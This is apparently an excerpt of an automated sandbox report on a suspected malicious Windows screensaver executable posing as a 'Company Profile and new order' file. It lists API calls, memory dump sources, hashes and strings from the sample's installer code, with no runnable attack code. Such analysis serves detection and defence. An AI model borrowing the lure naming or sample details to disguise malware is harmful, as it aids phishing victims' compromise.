                                                                                            • ShowWindow.USER32(?,00000000), ref: 004054F1
                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 004054FC
                                                                                            • ShowWindow.USER32(00000000), ref: 00405503
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                            • String ID: $M$N
                                                                                            • API String ID: 2564846305-813528018
                                                                                            • Opcode ID: 963d0e2195837636cb6f5b073c234fd9fc9862b141633064f8114fc5dd327728
                                                                                            • Instruction ID: 467e9106b9ab4b1e9b2d04e68362d71007c986f05034cc4a0cb7dcf353c6e141
                                                                                            • Opcode Fuzzy Hash: 963d0e2195837636cb6f5b073c234fd9fc9862b141633064f8114fc5dd327728
                                                                                            • Instruction Fuzzy Hash: 16029B70A00609EFDB20DF95DD45AAF7BB5FB44314F10817AE610BA2E1D7B98A42CF58
                                                                                            APIs
                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046FD
                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404711
                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040472E
                                                                                            • GetSysColor.USER32(?), ref: 0040473F
                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040474D
                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040475B
                                                                                            • lstrlenW.KERNEL32(?), ref: 00404760
                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040476D
                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404782
                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 004047DB
                                                                                            • SendMessageW.USER32(00000000), ref: 004047E2
                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0040480D
                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404850
                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 0040485E
                                                                                            • SetCursor.USER32(00000000), ref: 00404861
                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040487A
                                                                                            • SetCursor.USER32(00000000), ref: 0040487D
                                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048AC
                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048BE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                            • String ID: : Completed$N
                                                                                            • API String ID: 3103080414-2140067464
                                                                                            • Opcode ID: d465d3d5382bb59059b47d3503e7a252332af71f120e52871dcbc052c6d80ab7
                                                                                            • Instruction ID: fa786ba7610ecb1ae21ae2169d8ef808fc0b2da043ab7544d4c43deaa2774949
                                                                                            • Opcode Fuzzy Hash: d465d3d5382bb59059b47d3503e7a252332af71f120e52871dcbc052c6d80ab7
                                                                                            • Instruction Fuzzy Hash: 7F61B3B1A00209BFDB10AF64DD85A6A7B79FB84354F00843AFB05B61D0D7B9AD61CF58
                                                                                            APIs
                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                            • DrawTextW.USER32(00000000,00428A20,000000FF,00000010,00000820), ref: 00401156
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                            • String ID: F
                                                                                            • API String ID: 941294808-1304234792
                                                                                            • Opcode ID: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                                                            • Instruction ID: d1034cbb9d528375343357a353c0022e70e8214492c202610c441178c5bfc5cd
                                                                                            • Opcode Fuzzy Hash: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                                                            • Instruction Fuzzy Hash: FC417B71800249AFCB058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB74DA55DFA4
                                                                                            APIs
                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406302,?,?), ref: 004061A2
                                                                                            • GetShortPathNameW.KERNEL32(?,004265A8,00000400), ref: 004061AB
                                                                                              • Part of subcall function 00405F76: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F86
                                                                                              • Part of subcall function 00405F76: lstrlenA.KERNEL32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB8
                                                                                            • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 004061C8
                                                                                            • wsprintfA.USER32 ref: 004061E6
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00426DA8,C0000000,00000004,00426DA8,?,?,?,?,?), ref: 00406221
                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406230
                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406268
                                                                                            • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004261A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062BE
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 004062CF
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062D6
                                                                                              • Part of subcall function 00406011: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe,80000000,00000003), ref: 00406015
                                                                                              • Part of subcall function 00406011: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406037
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                            • String ID: %ls=%ls$[Rename]
                                                                                            • API String ID: 2171350718-461813615
                                                                                            • Opcode ID: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                                                            • Instruction ID: d8f03b5b48010a369f687ed07a259b5d04d98e8e290d987932ab0f9f84d7b5e4
                                                                                            • Opcode Fuzzy Hash: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                                                            • Instruction Fuzzy Hash: 89313230201325BFD6207B659D48F2B3A6CDF41714F12007EBA02F62C2EA7D98218ABD
                                                                                            APIs
                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406832
                                                                                            • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406841
                                                                                            • CharNextW.USER32(?,"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406846
                                                                                            • CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406859
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004067D0
                                                                                            • *?|<>/":, xrefs: 00406821
                                                                                            • "C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe", xrefs: 00406813
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: Char$Next$Prev
                                                                                            • String ID: "C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 589700163-2026325617
                                                                                            • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                            • Instruction ID: 2d41fa7b6770246c30beeceb47eb68b435a53440eacd13368e2f30b8c56315d6
                                                                                            • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                            • Instruction Fuzzy Hash: A511935680121296DB303B14CC44ABB66E8AF54794F52C03FE999732C1E77C5C9296BD
                                                                                            APIs
                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00404524
                                                                                            • GetSysColor.USER32(00000000), ref: 00404562
                                                                                            • SetTextColor.GDI32(?,00000000), ref: 0040456E
                                                                                            • SetBkMode.GDI32(?,?), ref: 0040457A
                                                                                            • GetSysColor.USER32(?), ref: 0040458D
                                                                                            • SetBkColor.GDI32(?,?), ref: 0040459D
                                                                                            • DeleteObject.GDI32(?), ref: 004045B7
                                                                                            • CreateBrushIndirect.GDI32(?), ref: 004045C1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2320649405-0
                                                                                            • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                            • Instruction ID: 524417ed32742d4b72cd17798d780815826fd18a7bcb7bb0f1ed1fdd1052d135
                                                                                            • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                            • Instruction Fuzzy Hash: B22135B1500705AFCB319F78DD08B577BF5AF81714B048A2DEA96A26E0D738D944CB54
                                                                                            APIs
                                                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1
                                                                                              • Part of subcall function 004060F2: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406108
                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                            • String ID: 9
                                                                                            • API String ID: 163830602-2366072709
                                                                                            • Opcode ID: 0fe20a848d4a285c173513a47146d0bdd1f0b43cc80ef0beb9e6d9777ffbd6ad
                                                                                            • Instruction ID: 4938fc2aff7960a3a7fedf371d3c64c497049ea43b58312dd80c80f6ae9549af
                                                                                            • Opcode Fuzzy Hash: 0fe20a848d4a285c173513a47146d0bdd1f0b43cc80ef0beb9e6d9777ffbd6ad
                                                                                            • Instruction Fuzzy Hash: 5051FB75D0421AABDF249FD4CA84AAEBB79FF04344F10817BE901B62D0D7B49D828B58
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E76
                                                                                            • GetMessagePos.USER32 ref: 00404E7E
                                                                                            • ScreenToClient.USER32(?,?), ref: 00404E98
                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EAA
                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404ED0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message$Send$ClientScreen
                                                                                            • String ID: f
                                                                                            • API String ID: 41195575-1993550816
                                                                                            • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                            • Instruction ID: cfceae8db68972c520d490933057d7cb8d8acba3ea2256e028311c612775fba1
                                                                                            • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                            • Instruction Fuzzy Hash: A3015E7190021CBADB00DB94DD85BFFBBBCAF95B11F10412BBA51B61D0C7B49A418BA4
                                                                                            APIs
                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
                                                                                            • MulDiv.KERNEL32(000C2EA7,00000064,000C2EAB), ref: 00402FE1
                                                                                            • wsprintfW.USER32 ref: 00402FF1
                                                                                            • SetWindowTextW.USER32(?,?), ref: 00403001
                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013
                                                                                            Strings
                                                                                            • verifying installer: %d%%, xrefs: 00402FEB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                            • String ID: verifying installer: %d%%
                                                                                            • API String ID: 1451636040-82062127
                                                                                            • Opcode ID: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                                                            • Instruction ID: f83dc0eaaa7e9df2961e53678d13a3899a4bf5fcca0c0537cb294ee04905d4b1
                                                                                            • Opcode Fuzzy Hash: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                                                            • Instruction Fuzzy Hash: EF014F71640208BBEF209F60DD49FEE3B69AB44345F108039FA06A51D0DBB99A559F58
                                                                                            APIs
                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                                                                            • GlobalFree.KERNEL32(?), ref: 00402A0B
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
